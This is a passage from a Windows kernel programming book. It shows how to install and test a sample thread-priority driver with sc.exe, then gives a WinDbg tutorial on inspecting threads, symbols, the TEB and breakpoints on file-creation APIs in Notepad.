data->ThreadId, oldPriority, data->Priority));
ObDereferenceObject(thread);
information = sizeof(data);
} while (false);
Irp->IoStatus.Status = status;
Irp->IoStatus.Information = information;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
Installing and Testing
At this point, we can build the driver and client successfully. Our next step is to install the driver and test
its functionality. You can try the following on a virtual machine, or if you’re feeling brave enough - on
your development machine.
First, let’s install the driver. Copy the resulting booster.sys file to the target machine (if it’s not your
development machine). On the target machine, open an elevated command window and install the driver
using the sc.exe tool as we did back in chapter 2:
c:\> sc create booster type= kernel binPath= c:\Test\Booster.sys
Make sure binPath includes the full path of the resulting SYS file. The name of the driver (booster) in the
example is the name of the created Registry key, and so must be unique. It doesn’t have to be related to
the SYS file name.
Now we can load the driver:
Chapter 4: Driver from Start to Finish
71
c:\> sc start booster
If all is well, the driver would have started successfully. To make sure, we can open WinObj and look for
our device name and symbolic link. Figure 4-1 shows the symbolic link in WinObj.
Figure 4-1: Symbolic Link in WinObj
Now we can finally run the client executable. Figure 4-2 shows a thread in Process Explorer of a cmd.exe
process selected as an example for which we want set priority to a new value.
Chapter 4: Driver from Start to Finish
72
Figure 4-2: Original thread priority
Run the client with the thread ID and the desired priority (replace the thread ID as needed):
c:\Test> boost 768 25
Chapter 4: Driver from Start to Finish
73
If you get an error trying to run the executable (usually it’s a Debug build), you may need to set
the runtime library to a static one instead of a DLL. Go to Project properties in Visual Studio for
the client application, C++ node, Code Generation, Runtime Library, and select Multithreaded
Debug. Alternatively, you can compile the client in Release build, and that should run without
any changes.
And voila! See figure 4-3.
You should also run DbgView and see the output when a successful priority change occurrs.
Chapter 4: Driver from Start to Finish
74
Figure 4-3: Modified thread priority
Summary
We’ve seen how to build a simple, yet complete, driver, from start to finish. We created a user-mode client
to communicate with the driver. In the next chapter, we’ll tackle debugging, which is something we’re
bound to do when writing drivers that may not behave as we expect.
Chapter 5: Debugging and Tracing
Just like with any software, kernel drivers tend to have bugs. Debugging drivers, as opposed to user-mode
debugging, is more challenging. Driver debugging is essentially debugging an entire machine, not just
a specific process. This requires a somewhat different mindset. This chapter discussed user-mode and
kernel-mode debugging using the WinDbg debugger.
In this chapter:
• Debugging Tools for Windows
• Introduction to WinDbg
• Kernel Debugging
• Full Kernel Debugging
• Kernel Driver Debugging Tutorial
• Asserts and Tracing
Debugging Tools for Windows
The Debugging Tools for Windows package contains a set of debuggers, tools, and documentation focusing
on the debuggers within the package. This package can be installed as part of the Windows SDK or the
WDK, but there is no real “installation” done. The installation just copies files but does not touch the
Registry, meaning the package depends only on its own modules and the Windows built-in DLLs. This
makes it easy to copy the entire directory to any other directory including removable media.
The package contains four debuggers: Cdb.exe, Ntsd.Exe, Kd.exe, and WinDbg.exe. Here is a rundown of
the basic functionality of each debugger:
• Cdb and Ntsd are user-mode, console-based debuggers. This means they can be attached to processes,
just like any other user-mode debugger. Both have console UI - type in a command, get a response,
and repeat. The only difference between the two is that if launched from a console window, Cdb uses
the same console, whereas Ntsd always opens a new console window. They are otherwise identical.
• Kd is a kernel debugger with a console user interface. It can attach to the local kernel (Local
Kernel Debugging, described in the next section), or to another machine for a full kernel debugging
experience.
• WinDbg is the only debugger with a graphical user interface. It can be used for user-mode debugging
or kernel debugging, depending on the selection performed with its menus or the command line
arguments passed to it when launched.
Chapter 5: Debugging and Tracing
76
A relatively recent alternative to the classic WinDbg is Windbg Preview, available through the Microsoft
store. This is a remake of the classic debugger with a much better user interface. It can be installed on
Windows 10 version 1607 or later. From a functionality standpoint, it’s similar to the classic WinDbg. But
it is somewhat easier to use because of the modern, convenient UI, and in fact has also solved some bugs
that still plague the classic debugger. All the commands we’ll see in this chapter work equally well with
either debugger.
Although these debuggers may seem different from one another, the user-mode debuggers are essentially
the same, as are the kernel debuggers. They are all based around a single debugger engine implemented
as a DLL (DbgEng.Dll). The various debuggers are able to use extension DLLs, that provide most of the
power of the debuggers by loading new commands.
The Debugger Engine is documented to a large extent in the Debugging tools for Windows documentation,
which makes it possible to write new debuggers (or other tools) that utilize the debugger engine.
Other tools that are part of the package include the following (partial list):
• Gflags.exe - the Global Flags tool that allows setting some kernel flags and image flags.
• ADPlus.exe - generate a dump file for a process crash or hang.
• Kill.exe - a simple tool to terminate process(es) based on process ID, name, or pattern.
• Dumpchk.exe - tool to do some general checking of dump files.
• TList.exe - lists running processes on the system with various options.
• Umdh.exe - analyzes heap allocations in user-mode processes.
• UsbView.exe - displays a hierarchical view of USB devices and hubs.
Introduction to WinDbg
This section describes the fundamentals of WinDbg, but bear in mind everything is essentially the same
for the console debuggers, with the exception of the GUI windows.
WinDbg is built around commands. The user enters a command, and the debugger responds with text
describing the results of the command. With the GUI, some of these results are depicted in dedicated
windows, such as locals, stack, threads, etc.
WinDbg supports three types of commands:
• Intrinsic commands - these commands are built-in into the debugger (part of the debugger engine),
and they operate on the target being debugged.
• Meta commands - these commands start with a period (.) and they operate on the debugging
environment, rather than directly on the target being debugged.
Chapter 5: Debugging and Tracing
77
• Extension commands (sometimes called bang commands) - these commands start with an ex-
clamation point (!), providing much of the power of the debugger. All extension commands are
implemented in external DLLs. By default, the debugger loads a set of predefined extension DLLs,
but more can be loaded from the debugger directory or another directory with the .load meta
command.
Writing extension DLLs is possible and is fully documented in the debugger docs. In fact, many such DLLs
have been created and can be loaded from their respective source. These DLLs provide new commands
that enhance the debugging experience, often targeting specific scenarios.
Tutorial: User mode debugging basics
If you have experience with WinDbg usage in user-mode, you can safely skip this section.
This tutorial is aimed at getting a basic understanding of WinDbg and how to use it for user-mode
debugging. Kernel debugging is described in the next section.
There are generally two ways to initiate user-mode debugging - either launch an executable and attach to
it, or attach to an already existing process. We’ll use the latter approach in this tutorial, but except for this
first step, all other operations are identical.
• Launch Notepad.
• Launch WinDbg (either the Preview or the classic one. The following screenshots use the Preview).
• Select File / Attach To Process and locate the Notepad process in the list (see figure 5-1). Then click
Attach. You should see output similar to figure 5-2.
Chapter 5: Debugging and Tracing
78
Figure 5-1: Attaching to a process with WinDbg
Figure 5-2: First view after process attach
The Command window is the main window of interest - it should always be open. This is the one showing
Chapter 5: Debugging and Tracing
79
the various responses of commands. Typically, most of the time in a debugging session is spent interacting
with this window.
The process is suspended - we are in a breakpoint induced by the debugger.
• The first command we’ll use is ∼, which shows information about all threads in the debugged
process:
0:003> ~
0
Id: 874c.18068 Suspend: 1 Teb: 00000001`2229d000 Unfrozen
1
Id: 874c.46ac Suspend: 1 Teb: 00000001`222a5000 Unfrozen
2
Id: 874c.152cc Suspend: 1 Teb: 00000001`222a7000 Unfrozen
.
3
Id: 874c.bb08 Suspend: 1 Teb: 00000001`222ab000 Unfrozen
The exact number of threads you’ll see may be different than shown here.
One thing that is very important is the existence of proper symbols. Microsoft provides a public symbol
server, which allows locating symbols for most modules by produced by Microsoft. This is essential in any
low-level debugging.
• To set symbols quickly, enter the .symfix command.
• A better approach is to set up symbols once and have them available for all future debugging sessions.
To do that, add a system environment variable named _NT_SYMBOL_PATH and set it to a string
like the following:
SRV*c:\Symbols*http://msdl.microsoft.com/download/symbols
The middle part (between asterisks) is a local path for caching symbols on your local machine; you
can select any path you like (including a network share, if sharing with a team is desired). Once this
environment variable is set, next invocations of the debugger will find symbols automatically and load
them from the Microsoft symbol server as needed.
The debuggers in the Debugging Tools for Windows are not the only tools that look for this
environment variables. Sysinternals tools (e.g. Process Explorer, Process Monitor), Visual Studio,
and others look for the same variable as well. You set it once, and get its benefit using multiple
tools.
• To make sure you have proper symbols, enter the lm (loaded modules) command:
Chapter 5: Debugging and Tracing
80
0:003> lm
start
end
module name
00007ff7`53820000 00007ff7`53863000
notepad
(deferred)
00007ffb`afbe0000 00007ffb`afca6000
efswrt
(deferred)
...
00007ffc`1db00000 00007ffc`1dba8000
shcore
(deferred)
00007ffc`1dbb0000 00007ffc`1dc74000
OLEAUT32
(deferred)
00007ffc`1dc80000 00007ffc`1dd22000
clbcatq
(deferred)
00007ffc`1dd30000 00007ffc`1de57000
COMDLG32
(deferred)
00007ffc`1de60000 00007ffc`1f350000
SHELL32
(deferred)
00007ffc`1f500000 00007ffc`1f622000
RPCRT4
(deferred)
00007ffc`1f630000 00007ffc`1f6e3000
KERNEL32
(pdb symbols)
c:\symbols\ker\
nel32.pdb\3B92DED9912D874A2BD08735BC0199A31\kernel32.pdb
00007ffc`1f700000 00007ffc`1f729000
GDI32
(deferred)
00007ffc`1f790000 00007ffc`1f7e2000
SHLWAPI
(deferred)
00007ffc`1f8d0000 00007ffc`1f96e000
sechost
(deferred)
00007ffc`1f970000 00007ffc`1fc9c000
combase
(deferred)
00007ffc`1fca0000 00007ffc`1fd3e000
msvcrt
(deferred)
00007ffc`1fe50000 00007ffc`1fef3000
ADVAPI32
(deferred)
00007ffc`20380000 00007ffc`203ae000
IMM32
(deferred)
00007ffc`203e0000 00007ffc`205cd000
ntdll
(pdb symbols)
c:\symbols\ntd\
ll.pdb\E7EEB80BFAA91532B88FF026DC6B9F341\ntdll.pdb
The list of modules shows all modules (DLLs and the EXE) loaded into the debugged process at this time.
You can see the start and end virtual addresses into which each module is loaded. Following the module
name you can see the symbol status of this module (in parenthesis). Possible values include:
• deferred - the symbols for this module were not needed in this debugging session so far, and so
are not loaded at this time. The symbols will be loaded when needed (for example, if a call stack
contains a function from that module). This is the default value.
• pdb symbols - proper public symbols have been loaded. The local path of the PDB file is displayed.
• private pdb symbols - private symbols are available. This would be the case for your own modules,
compiled with Visual Studio. For Microsoft modules, this is very rare (at the time of writing,
combase.dll is provided with private symbols). With private symbols, you have information about
local variables and private types.
• export symbols - only exported symbols are available for this DLL. This typically means there are
no symbols for this module, but the debugger is able to use the exported sysmbols. It’s better than
no symbols at all, but could be confusing, as the debugger will use the closet export it can find, but
the real function is most likely different.
• no symbols - this module’s symbols were attempted to be located, but nothing was found, not even
exported symbols (such modules don’t have exported symbols, as is the case of an executable or
driver files).
You can force loading of a module’s symbols using the following command:
Chapter 5: Debugging and Tracing
81
.reload /f modulename.dll
This will provide definitive evidence to the availability of symbols for this module.
Symbol paths can also be configured in the debugger’s settings dialog.
Open the File / Settings menu and locate Debugging Settings. You can then add more paths for symbol
searching. This is useful if debugging your own code, so you would like the debugger to search your
directories where relevant PDB files may be found (see figure 5-3).
Figure 5-3: Symbols and source paths configuration
Make sure you have symbols configured correctly before you proceed. To diagnose any issues, you can
enter the !sym noisy command that logs detailed information for symbol load attempts.
Back to the thread list - notice that one of the threads has a dot in front of its data. This is the current
thread as far as the debugger is concerned. This means that any command issued that involves a thread,
where the thread is not explicitly specified, will work on that thread. This “current thread” is also shown
in the prompt - the number to the right of the colon is the current thread index (3 in this example).
Enter the k command, that shows the stack trace for the current thread:
0:003> k
# Child-SP
RetAddr
Call Site
00 00000001`224ffbd8 00007ffc`204aef5b ntdll!DbgBreakPoint
01 00000001`224ffbe0 00007ffc`1f647974 ntdll!DbgUiRemoteBreakin+0x4b
02 00000001`224ffc10 00007ffc`2044a271 KERNEL32!BaseThreadInitThunk+0x14
03 00000001`224ffc40 00000000`00000000 ntdll!RtlUserThreadStart+0x21
Chapter 5: Debugging and Tracing
82
How can you tell that you don’t have proper symbols except using the lm command? If you see
very large offsets from the beginning of a function, this is probably not the real function name
- it’s just the closest one the debugger knows about. “Large offsets” is obviously a relative term,
but a good rule of thumb is that a 4-hex digit offset is almost always wrong.
You can see the list of calls made on this thread (user-mode only, of course). The top of the call stack in the
above output is the function DbgBreakPoint located in the module ntdll.dll. The general format of
addresses with symbols is modulename!functionname+offset. The offset is optional and could be
zero if it’s exactly the start of this function. Also notice the module name is without an extension.
In the output above, DbgBreakpoint was called by DbgUiRemoteBreakIn, which was called by
BaseThreadInitThunk, and so on.
This thread, by the way, was injected by the debugger in order to break into the target forcefully.
To switch to a different thread, use the following command: ∼ns where n is the thread index. Let’s switch
to thread 0 and then display its call stack:
0:003> ~0s
win32u!NtUserGetMessage+0x14:
00007ffc`1c4b1164 c3
ret
0:000> k
# Child-SP
RetAddr
Call Site
00 00000001`2247f998 00007ffc`1d802fbd win32u!NtUserGetMessage+0x14
01 00000001`2247f9a0 00007ff7`5382449f USER32!GetMessageW+0x2d
02 00000001`2247fa00 00007ff7`5383ae07 notepad!WinMain+0x267
03 00000001`2247fb00 00007ffc`1f647974 notepad!__mainCRTStartup+0x19f
04 00000001`2247fbc0 00007ffc`2044a271 KERNEL32!BaseThreadInitThunk+0x14
05 00000001`2247fbf0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
This is Notepad’s main (first) thread. The top of the stack shows the thread waiting for UI messages
(win32u!NtUserGetMessage). The thread is actually waiting in kernel mode, but this is invisible from
a user-mode debugger’s view.
An alternative way to show the call stack of another thread without switching to it, is to use the tilde and
thread number before the actual command. The following output is for thread 1’s stack:
Chapter 5: Debugging and Tracing
83
0:000> ~1k
# Child-SP
RetAddr
Call Site
00 00000001`2267f4c8 00007ffc`204301f4 ntdll!NtWaitForWorkViaWorkerFactory+0x14
01 00000001`2267f4d0 00007ffc`1f647974 ntdll!TppWorkerThread+0x274
02 00000001`2267f7c0 00007ffc`2044a271 KERNEL32!BaseThreadInitThunk+0x14
03 00000001`2267f7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
The above call stack is very common, and indicates a thread that is part of the thread pool.
TppWorkerThread is the thread entry point for thread pool threads (Tpp is short for “Thread
Pool Private”).
Let’s go back to the list of threads:
.
0
Id: 874c.18068 Suspend: 1 Teb: 00000001`2229d000 Unfrozen
1
Id: 874c.46ac Suspend: 1 Teb: 00000001`222a5000 Unfrozen
2
Id: 874c.152cc Suspend: 1 Teb: 00000001`222a7000 Unfrozen
#
3
Id: 874c.bb08 Suspend: 1 Teb: 00000001`222ab000 Unfrozen
Notice the dot has moved to thread 0 (current thread), revealing a hash sign (#) on thread 3. The thread
marked with a hash (#) is the one that caused the last breakpoint (which in this case was our initial debugger
attach).
The basic information for a thread provided by the ∼ command is shown in figure 5-4.
Figure 5-4: Thread information for the ∼ command
Most numbers reported by WinDbg are hexadecimal by default. To convert a value to decimal, you can
use the ? (evaluate expression) command.
Type the following to get the decimal process ID (you can then compare to the reported PID in Task
Manager):
Chapter 5: Debugging and Tracing
84
0:000> ? 874c
Evaluate expression: 34636 = 00000000`0000874c
You can express decimal numbers with the 0n prefix, so you can get the inverse result as well:
0:000> ? 0n34636
Evaluate expression: 34636 = 00000000`0000874c
The 0y prefix can be used in WinDbg to specify binary values. For example, using 0y1100 is
the same as 0n12 as is 0xc. You can use the ? command to see the converted values.
You can examine the TEB of a thread by using the !teb command. Using !teb without an address shows
the TEB of the current thread:
0:000> !teb
TEB at 000000012229d000
ExceptionList:
0000000000000000
StackBase:
0000000122480000
StackLimit:
000000012246f000
SubSystemTib:
0000000000000000
FiberData:
0000000000001e00
ArbitraryUserPointer: 0000000000000000
Self:
000000012229d000
EnvironmentPointer:
0000000000000000
ClientId:
000000000000874c . 0000000000018068
RpcHandle:
0000000000000000
Tls Storage:
000001c93676c940
PEB Address:
000000012229c000
LastErrorValue:
0
LastStatusValue:
8000001a
Count Owned Locks:
0
HardErrorMode:
0
0:000> !teb 00000001`222a5000
TEB at 00000001222a5000
ExceptionList:
0000000000000000
StackBase:
0000000122680000
StackLimit:
000000012266f000
SubSystemTib:
0000000000000000
FiberData:
0000000000001e00
ArbitraryUserPointer: 0000000000000000
Self:
00000001222a5000
Chapter 5: Debugging and Tracing
85
EnvironmentPointer:
0000000000000000
ClientId:
000000000000874c . 00000000000046ac
RpcHandle:
0000000000000000
Tls Storage:
000001c936764260
PEB Address:
000000012229c000
LastErrorValue:
0
LastStatusValue:
c0000034
Count Owned Locks:
0
HardErrorMode:
0
Some data shown by the !teb command is relatively known or easy to guess:
• StackBase and StackLimit - user-mode current stack base and stack limit for the thread.
• ClientId - process and thread IDs.
• LastErrorValue - last Win32 error code (GetLastError).
• TlsStorage - Thread Local Storage (TLS) array for this thread (full explanation of TLS is beyond the
scope of this book).
• PEB Address - address of the Process Environment Block (PEB), viewable with the !peb command.
• LastStatusValue - last NTSTATUS value returned from a system call.
• The !teb command (and similar commands) shows parts of the real data structure behind the
scenes, in this case _TEB. You can always look at the real structure using the dt (display type)
command:
0:000> dt ntdll!_teb
+0x000 NtTib
: _NT_TIB
+0x038 EnvironmentPointer : Ptr64 Void
+0x040 ClientId
: _CLIENT_ID
+0x050 ActiveRpcHandle
: Ptr64 Void
+0x058 ThreadLocalStoragePointer : Ptr64 Void
+0x060 ProcessEnvironmentBlock : Ptr64 _PEB
...
+0x1808 LockCount
: Uint4B
+0x180c WowTebOffset
: Int4B
+0x1810 ResourceRetValue : Ptr64 Void
+0x1818 ReservedForWdf
: Ptr64 Void
+0x1820 ReservedForCrt
: Uint8B
+0x1828 EffectiveContainerId : _GUID
Notice that WinDbg is not case sensitive when it comes to symbols. Also, notice the structure name starting
with an underscore; this the way most structures are defined in Windows (user-mode and kernel-mode).
Using the typedef name (without the underscore) may or may not work, so always using the underscore
is recommended.
Chapter 5: Debugging and Tracing
86
How do you know which module defines a structure you wish to view? If the structure
is documented, the module would be listed in the docs for the structure. You can also try
specifying the structure without the module name, forcing the debugger to search for it.
Generally, you “know” where the structure is defined with experience and sometimes context.
If you attach an address to the previous command, you can get the actual values of data members:
0:000> dt ntdll!_teb 00000001`2229d000
+0x000 NtTib
: _NT_TIB
+0x038 EnvironmentPointer : (null)
+0x040 ClientId
: _CLIENT_ID
+0x050 ActiveRpcHandle
: (null)
+0x058 ThreadLocalStoragePointer : 0x000001c9`3676c940 Void
+0x060 ProcessEnvironmentBlock : 0x00000001`2229c000 _PEB
+0x068 LastErrorValue
: 0
...
+0x1808 LockCount
: 0
+0x180c WowTebOffset
: 0n0
+0x1810 ResourceRetValue : 0x000001c9`3677fd00 Void
+0x1818 ReservedForWdf
: (null)
+0x1820 ReservedForCrt
: 0
+0x1828 EffectiveContainerId : _GUID {00000000-0000-0000-0000-000000000000}
Each member is shown with its offset from the beginning of the structure, its name, and its value. Simple
values are shown directly, while structure values (such as NtTib above) are shown with a hyperlink.
Clicking this hyperlink provides the details of the structure.
Click on the NtTib member above to show the details of this data member:
0:000> dx -r1 (*((ntdll!_NT_TIB *)0x12229d000))
(*((ntdll!_NT_TIB *)0x12229d000))
[Type: _NT_TIB]
[+0x000] ExceptionList
: 0x0 [Type: _EXCEPTION_REGISTRATION_RECORD *]
[+0x008] StackBase
: 0x122480000 [Type: void *]
[+0x010] StackLimit
: 0x12246f000 [Type: void *]
[+0x018] SubSystemTib
: 0x0 [Type: void *]
[+0x020] FiberData
: 0x1e00 [Type: void *]
[+0x020] Version
: 0x1e00 [Type: unsigned long]
[+0x028] ArbitraryUserPointer : 0x0 [Type: void *]
[+0x030] Self
: 0x12229d000 [Type: _NT_TIB *]
The debugger uses the newer dx command to view data. See the section “Advanced Debugging with
WinDbg” later in this chapter for more on the dx command.
Chapter 5: Debugging and Tracing
87
If you don’t see hyperlinks, you may be using a very old WinDbg, where Debugger Markup Language
(DML) is not on by default. You can turn it on with the .prefer_dml 1 command.
Now let’s turn our attention to breakpoints. Let’s set a breakpoint when a file is opened by notepad.
• Type the following command to set a breakpoint in the CreateFile API function:
0:000> bp kernel32!createfilew
Notice the function name is in fact CreateFileW, as there is no function called CreateFile. In code,
this is a macro that expands to CreateFileW (wide, Unicode version) or CreateFileA (ASCII or Ansi
version) based on a compilation constant named UNICODE. WinDbg responds with nothing. This is a good
thing.
The reason there are two sets of functions for most APIs where strings are involved is a historical
one. In any case, Visual Studio projects define the UNICODE constant by default, so Unicode is
the norm. This is a good thing - most of the A functions convert their input to Unicode and call
the W function.
You can list the existing breakpoints with the bl command:
0:000> bl
0 e Disable Clear
00007ffc`1f652300
0001 (0001)
0:**** KERNEL32!CreateFileW
You can see the breakpoint index (0), whether it’s enabled or disabled (e=enabled, d=disabled), and you
get DML hyperlinks to disable (bd command) and delete (bc command) the breakpoint.
Now let notepad continue execution, until the breakpoint hits:
Type the g command or press the Go button on the toolbar or hit F5:
You’ll see the debugger showing Busy in the prompt and the command area shows Debuggee is running,
meaning you cannot enter commands until the next break.
Notepad should now be alive. Go to its File menu and select Open…. The debugger should spew details of
module loads and then break:
Chapter 5: Debugging and Tracing
88
Breakpoint 0 hit
KERNEL32!CreateFileW:
00007ffc`1f652300 ff25aa670500
jmp
qword ptr [KERNEL32!_imp_CreateFileW \
(00007ffc`1f6a8ab0)] ds:00007ffc`1f6a8ab0={KERNELBASE!CreateFileW (00007ffc`1c7\
5e260)}
• We have hit the breakpoint! Notice the thread in which it occurred. Let’s see what the call stack
looks like (it may take a while to show if the debugger needs to download symbols from Microsoft’s
symbol server):
0:002> k
# Child-SP
RetAddr
Call Site
00 00000001`226fab08 00007ffc`061c8368 KERNEL32!CreateFileW
01 00000001`226fab10 00007ffc`061c5d4d mscoreei!RuntimeDesc::VerifyMainRuntimeM\
odule+0x2c
02 00000001`226fab60 00007ffc`061c6068 mscoreei!FindRuntimesInInstallRoot+0x2fb
03 00000001`226fb3e0 00007ffc`061cb748 mscoreei!GetOrCreateSxSProcessInfo+0x94
04 00000001`226fb460 00007ffc`061cb62b mscoreei!CLRMetaHostPolicyImpl::GetReque\
stedRuntimeHelper+0xfc
05 00000001`226fb740 00007ffc`061ed4e6 mscoreei!CLRMetaHostPolicyImpl::GetReque\
stedRuntime+0x120
...
21 00000001`226fede0 00007ffc`1df025b2 SHELL32!CFSIconOverlayManager::LoadNonlo\
adedOverlayIdentifiers+0xaa
22 00000001`226ff320 00007ffc`1df022af SHELL32!EnableExternalOverlayIdentifiers\
+0x46
23 00000001`226ff350 00007ffc`1def434e SHELL32!CFSIconOverlayManager::RefreshOv\
erlayImages+0xff
24 00000001`226ff390 00007ffc`1cf250a3 SHELL32!SHELL32_GetIconOverlayManager+0x\
6e
25 00000001`226ff3c0 00007ffc`1ceb2726 windows_storage!CFSFolder::_GetOverlayIn\
fo+0x12b
26 00000001`226ff470 00007ffc`1cf3108b windows_storage!CAutoDestItemsFolder::Ge\
tOverlayIndex+0xb6
27 00000001`226ff4f0 00007ffc`1cf30f87 windows_storage!CRegFolder::_GetOverlayI\
nfo+0xbf
28 00000001`226ff5c0 00007ffb`df8fc4d1 windows_storage!CRegFolder::GetOverlayIn\
dex+0x47
29 00000001`226ff5f0 00007ffb`df91f095 explorerframe!CNscOverlayTask::_Extract+\
0x51
2a 00000001`226ff640 00007ffb`df8f70c2 explorerframe!CNscOverlayTask::InternalR\
esumeRT+0x45
Chapter 5: Debugging and Tracing
89
2b 00000001`226ff670 00007ffc`1cf7b58c explorerframe!CRunnableTask::Run+0xb2
2c 00000001`226ff6b0 00007ffc`1cf7b245 windows_storage!CShellTask::TT_Run+0x3c
2d 00000001`226ff6e0 00007ffc`1cf7b125 windows_storage!CShellTaskThread::Thread\
Proc+0xdd
2e 00000001`226ff790 00007ffc`1db32ac6 windows_storage!CShellTaskThread::s_Thre\
adProc+0x35
2f 00000001`226ff7c0 00007ffc`204521c5 shcore!ExecuteWorkItemThreadProc+0x16
30 00000001`226ff7f0 00007ffc`204305c4 ntdll!RtlpTpWorkCallback+0x165
31 00000001`226ff8d0 00007ffc`1f647974 ntdll!TppWorkerThread+0x644
32 00000001`226ffbc0 00007ffc`2044a271 KERNEL32!BaseThreadInitThunk+0x14
33 00000001`226ffbf0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
Your call stack may be different, as it depends on the Windows version, and any extensions that may be
loaded and used by the open file dialog box.
What can we do at this point? You may wonder what file is being opened. We can get that information
based on the calling convention of the CreateFileW function. Since this is a 64-bit process (and the
processor is Intel/AMD), the calling convention states that the first integer/pointer arguments are passed
in the RCX, RDX, R8, and R9 registers (in this order). Since the file name in CreateFileW is the first
argument, the relevant register is RCX.
You can get more information on calling conventions in the Debugger documentation (or in several web
resources).
Display the value of the RCX register with the r command (you’ll get a different value):
0:002> r rcx
rcx=00000001226fabf8
We can view the memory pointed by RCX with various d (display) family of commands. Here is the db
command, interpreting the data as bytes.
Chapter 5: Debugging and Tracing
90
0:002> db 00000001226fabf8
00000001`226fabf8
43 00 3a 00 5c 00 57 00-69 00 6e 00 64 00 6f 00
C.:.\.W.i.n\
.d.o.
00000001`226fac08
77 00 73 00 5c 00 4d 00-69 00 63 00 72 00 6f 00
w.s.\.M.i.c\
.r.o.
00000001`226fac18
73 00 6f 00 66 00 74 00-2e 00 4e 00 45 00 54 00
s.o.f.t...N\
.E.T.
00000001`226fac28
5c 00 46 00 72 00 61 00-6d 00 65 00 77 00 6f 00
\.F.r.a.m.e\
.w.o.
00000001`226fac38
72 00 6b 00 36 00 34 00-5c 00 5c 00 76 00 32 00
r.k.6.4.\.\\
.v.2.
00000001`226fac48
2e 00 30 00 2e 00 35 00-30 00 37 00 32 00 37 00
..0...5.0.7\
.2.7.
00000001`226fac58
5c 00 63 00 6c 00 72 00-2e 00 64 00 6c 00 6c 00
\.c.l.r...d\
.l.l.
00000001`226fac68
00 00 76 1c fc 7f 00 00-00 00 00 00 00 00 00 00
..v........\
.....
The db command shows the memory in bytes, and ASCII characters on the right. It’s pretty clear what
the file name is, but because the string is Unicode, it’s not very convenient to see.
Use the du command to view Unicode string more conveniently:
0:002> du 00000001226fabf8
00000001`226fabf8
"C:\Windows\Microsoft.NET\Framewo"
00000001`226fac38
"rk64\\v2.0.50727\clr.dll"
You can use a register value directly by prefixing its name with @:
0:002> du @rcx
00000001`226fabf8
"C:\Windows\Microsoft.NET\Framewo"
00000001`226fac38
"rk64\\v2.0.50727\clr.dll"
Similarly, you can view the value of the second argument by looking at the rdx register.
Now let’s set another breakpoint in the native API that is called by CreateFileW - NtCreateFile:
0:002> bp ntdll!ntcreatefile
0:002> bl
0 e Disable Clear
00007ffc`1f652300
0001 (0001)
0:**** KERNEL32!CreateFil\
eW
1 e Disable Clear
00007ffc`20480120
0001 (0001)
0:**** ntdll!NtCreateFile
Notice the native API never uses W or A - it always works with Unicode strings (in fact it expects
UNICODE_STRING structures, as we’ve seen already).
Continue execution with the g command. The debugger should break:
Chapter 5: Debugging and Tracing
91
Breakpoint 1 hit
ntdll!NtCreateFile:
00007ffc`20480120 4c8bd1
mov
r10,rcx
Check the call stack again:
0:002> k
# Child-SP
RetAddr
Call Site
00 00000001`226fa938 00007ffc`1c75e5d6 ntdll!NtCreateFile
01 00000001`226fa940 00007ffc`1c75e2c6 KERNELBASE!CreateFileInternal+0x2f6
02 00000001`226faab0 00007ffc`061c8368 KERNELBASE!CreateFileW+0x66
03 00000001`226fab10 00007ffc`061c5d4d mscoreei!RuntimeDesc::VerifyMainRuntimeM\
odule+0x2c
04 00000001`226fab60 00007ffc`061c6068 mscoreei!FindRuntimesInInstallRoot+0x2fb
05 00000001`226fb3e0 00007ffc`061cb748 mscoreei!GetOrCreateSxSProcessInfo+0x94
...
List the next 8 instructions that are about to be executed with the u (unassemble or disassemble) command:
0:002> u
ntdll!NtCreateFile:
00007ffc`20480120 4c8bd1
mov
r10,rcx
00007ffc`20480123 b855000000
mov
eax,55h
00007ffc`20480128 f604250803fe7f01 test
byte ptr [SharedUserData+0x308 (0000\
0000`7ffe0308)],1
00007ffc`20480130 7503
jne
ntdll!NtCreateFile+0x15 (00007ffc`204\
80135)
00007ffc`20480132 0f05
syscall
00007ffc`20480134 c3
ret
00007ffc`20480135 cd2e
int
2Eh
00007ffc`20480137 c3
ret
Notice the value 0x55 is copied to the EAX register. This is the system service number for NtCreateFile,
as described in chapter 1. The syscall instruction shown is the one causing the transition to kernel-mode,
and then executing the NtCreateFile system service itself.
You can step over the next instruction with the p command (step - hit F10 as an alternative). You can step
into a function (in case of assembly, this is the call instruction) with the t command (trace - hit F11 as
an alternative):
Chapter 5: Debugging and Tracing
92
0:002> p
Breakpoint 1 hit
ntdll!NtCreateFile:
00007ffc`20480120 4c8bd1
mov
r10,rcx
0:002> p
ntdll!NtCreateFile+0x3:
00007ffc`20480123 b855000000
mov
eax,55h
0:002> p
ntdll!NtCreateFile+0x8:
00007ffc`20480128 f604250803fe7f01 test
byte ptr [SharedUserData+0x308 (0000\
0000`7ffe0308)],1 ds:00000000`7ffe0308=00
0:002> p
ntdll!NtCreateFile+0x10:
00007ffc`20480130 7503
jne
ntdll!NtCreateFile+0x15 (00007ffc`204\
80135) [br=0]
0:002> p
ntdll!NtCreateFile+0x12:
00007ffc`20480132 0f05
syscall
Stepping inside a syscall is not possible, as we’re in user-mode. When we step over/into it, all is done
and we get back a result.
0:002> p
ntdll!NtCreateFile+0x14:
00007ffc`20480134 c3
ret
The return value of functions in x64 calling convention is stored in EAX or RAX. For system calls, it’s an
NTSTATUS, so EAX contains the returned status:
0:002> r eax
eax=c0000034
Zero means success, and a negative value (in two’s complement, most significant bit is set) means an error.
We can get a textual description of the error with the !error command:
0:002> !error @eax
Error code: (NTSTATUS) 0xc0000034 (3221225524) - Object Name not found.
This means the file wasn’t found on the system.
Disable all breakpoints and let Notepad continue execution normally:
Chapter 5: Debugging and Tracing
93
0:002> bd *
0:002> g
Since we have no breakpoints at this time, we can force a break by clicking the Break button on the toolbar,
or hitting Ctrl+Break on the keyboard:
874c.16a54): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffc`20483080 cc
int
3
Notice the thread number in the prompt. Show all current threads:
0:022> ~
0
Id: 874c.18068 Suspend: 1 Teb: 00000001`2229d000 Unfrozen
1
Id: 874c.46ac Suspend: 1 Teb: 00000001`222a5000 Unfrozen
2
Id: 874c.152cc Suspend: 1 Teb: 00000001`222a7000 Unfrozen
3
Id: 874c.f7ec Suspend: 1 Teb: 00000001`222ad000 Unfrozen
4
Id: 874c.145b4 Suspend: 1 Teb: 00000001`222af000 Unfrozen
...
18
